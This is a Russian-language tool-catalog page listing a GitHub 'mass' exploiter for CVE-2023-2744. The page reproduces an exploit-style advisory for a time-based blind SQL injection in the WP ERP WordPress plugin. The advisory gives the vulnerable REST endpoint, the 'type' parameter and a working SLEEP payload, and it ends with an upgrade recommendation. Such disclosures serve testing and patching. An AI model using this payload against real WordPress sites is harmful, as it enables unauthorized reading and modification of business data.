Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-2744 — Массовый CVE-2023-2744 | Kitploit
Инструменты/GitHubGitHub/pashayogi/cve-2023-2744
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на Проникновение
GitHubpashayogi/cve-2023-2744

CVE-2023-2744

Массовый CVE-2023-2744

Репозиторий
1212 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Exploit Title: WP Plugins WP ERP <= 1.12.2 - SQL Injection

Date: 15-10-2023

Exploit Author: Arvandy

Software Link: https://wordpress.org/plugins/erp/

Vendor Homepage: https://wperp.com/

Version: 1.12.2

Tested on: Windows, Linux

CVE: CVE-2023-2744

Product Description

WP ERP — это первая полнофункциональная ERP (Enterprise Resource Planning) система, с помощью которой вы можете одновременно управлять вашим сайтом на WordPress и бизнесом с единой платформы. WP ERP стремится удовлетворить все потребности вашего предприятия с простотой. Благодаря отчетам в реальном времени и лучшему способу обработки бизнес-данных, сделайте вашу деятельность лучше управляемой, без ошибок и подготовьте вашу компанию к следующему рывку. WP ERP имеет 3 основных модуля: HR, CRM и Accounting, которые вместе составляют полную ERP-систему для любого типа бизнеса.

Vulnerability overview:

Модуль WordPress Plugins WP ERP - Accounting версии <= 1.12.2 уязвим для Blind SQL Injection (time-based) через параметр TYPE в конечной точке /wp-json/erp/v1/accounting/v1/people. Эта уязвимость может привести к несанкционированному доступу к данным и их модификации.

Proof of Concept:

Затронутая конечная точка: /wp-json/erp/v1/accounting/v1/people?type= Затронутый параметр: type полезная нагрузка: customer') AND (SELECT 1 FROM (SELECT SLEEP(3))x) AND ('x'='x

Recommendation

Обновите до версии 1.12.4

Скачать инструмент